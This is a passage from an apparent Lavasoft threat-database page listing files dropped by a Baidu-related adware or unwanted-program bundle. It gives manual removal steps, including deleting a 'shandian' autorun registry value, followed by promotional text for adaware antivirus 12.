      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2916 bytes)
      C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_d84.dat (100 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BSRLib.dat (5064 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVE.dll (6584 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\811.dat (8 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tuopan.png (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMStringUtils.dll (1856 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\806.dat (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\809.dat (3 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\iexplore.exe.xml (528 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\baidusdRepair.dll (4992 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CoolyContainerConfig.xml (329 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdmp.dat (784 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\updlog.dll (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\HIPS.dll (30968 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt.dll (15168 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
      %Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bddownloader.exe (41699 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bdcomproxy.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsdBB.tmp (90616 bytes)
      %Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\7z.dll (12536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (784 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (677 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\res\onlineWnd.zip (14184 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\hu.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMReport.dll.bdl (29865 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (24 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNet.dll.bdl (28289 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\System.dll (784 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMSkin.dll (36698 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\dl.dll (65930 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMNetGetInfo.dll (11344 bytes)
      %Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDMDownload.dll (5520 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\tmplrr89e.dll (29256 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\uqvv.exe.bdl (237681 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDLogicUtils.dll.bdl (39225 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)
      

      4. 

    4. Delete the following value(s) in the autorun key (How to Work with System Registry):
      

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "shandian" = "%Program Files%\shandian\shandian.exe"
      

      5. 

    5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
      6. 

    6. Reboot the computer.
      7. 

    

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
    

    

    

    

    


    
 
 




 
    No votes yet
    

    

    




    

    
				

    
							
    

			

				
					  
							

		
    
		
    

					
							

	
    
	
	        
    

	

        
      
     

      
      

      
    
     

    
   

		

    
		
    
		
			
    
			
    
				
    
					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				
    
				
    
					© 2026 Lavasoft. All rights reserved.
    
					Terms Of Use |   Privacy Policy
					

    
								
    
			
    

		
    
		

    
	
    
	
	
    
	
    
		x
		
    Our best antivirus yet!
    
		
    Fresh new look. Faster scanning. Better protection.
    
		
    
			
    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!
    
			
    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!
    
			
			Download adaware antivirus 12
		
    
		No thanks, continue to lavasoft.com
	
    
	
    
		
    
			close x
			
    Discover the new adaware antivirus 12
    
			
    Our best antivirus yet
    
			Download Now